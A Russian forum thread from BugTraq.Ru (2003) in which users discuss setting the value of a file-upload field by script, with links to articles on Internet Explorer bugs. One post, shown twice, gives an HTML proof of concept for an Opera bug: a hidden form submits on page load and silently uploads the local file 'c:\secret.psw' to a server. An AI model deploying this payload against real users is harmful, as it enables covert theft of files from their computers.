информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100 		За кого нас держат?Все любят медГде водятся OGRы
BugTraq.Ru
 Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Очередное исследование 19 миллиардов... 
 Оптимизация ввода-вывода как инструмент... 
 Зловреды выбирают Lisp и Delphi 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / web building
Имя Пароль
если вы видите этот текст, отключите в настройках форума использование JavaScript
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
Попробуй :) 16.07.03 09:20  Число просмотров: 1903
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 16.07.03 09:24  Количество правок: 3
<"чистая" ссылка>
... IE, например, вообще не позволяет использовать такую комбинацию. Но разработчики Opera пошли по иному пути. Они оставили возможность применять эту конструкцию, взамен, при попытке слить какой-либо файл, браузер спрашивает разрешения пользователя. Бага в том, что совокупность символов "&#10;" (конец строки в HTML представлении), добавленная после имени файла, позволяет обмануть Opera. Она думает, что файл не перекачивается и глубоко заблуждается. А чтобы не появлялось окно закачки (вернее, чтобы его не было видно) нужно добавить атрибут style="visibility:hidden". ... 

<HTML>
<HEAD>
<TITLE>Opera sends file </TITLE>
</HEAD>
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\secret.psw&#10;" style="visibility:hidden">
</form>
</body>
</HTML>

---

З.Ы. Сам не проверял.

http://www.cyberinfo.ru/6/559_1.htm
<web building>
нет способов подставить скриптом value в input type=file ? 15.07.03 21:48  
Автор: tdes <jin> Статус: Member
<"чистая" ссылка>
есть =) 30.07.03 12:38  
Автор: DgtlScrm Статус: Member
<"чистая" ссылка>
Все основано на багах эксплорера:
По новее:
http://www.xakep.ru/post/18474/default.htm
Более старый прикол:
http://www1.xakep.ru/post/15964/default.asp

А про Оперу я так понимаю ты уже знаешь ;)

DigitalScream resident 'SecurityLevel5'
про драг енд дроп уже читал раньше, не впечатлило, а вот про контрол очень прикольно )) 30.07.03 22:22  
Автор: tdes <jin> Статус: Member
<"чистая" ссылка>
Попробуй :) 16.07.03 09:20  
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 16.07.03 09:24  Количество правок: 3
<"чистая" ссылка>
... IE, например, вообще не позволяет использовать такую комбинацию. Но разработчики Opera пошли по иному пути. Они оставили возможность применять эту конструкцию, взамен, при попытке слить какой-либо файл, браузер спрашивает разрешения пользователя. Бага в том, что совокупность символов "&#10;" (конец строки в HTML представлении), добавленная после имени файла, позволяет обмануть Opera. Она думает, что файл не перекачивается и глубоко заблуждается. А чтобы не появлялось окно закачки (вернее, чтобы его не было видно) нужно добавить атрибут style="visibility:hidden". ... 

<HTML>
<HEAD>
<TITLE>Opera sends file </TITLE>
</HEAD>
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\secret.psw&#10;" style="visibility:hidden">
</form>
</body>
</HTML>

---

З.Ы. Сам не проверял.

http://www.cyberinfo.ru/6/559_1.htm
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2025 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach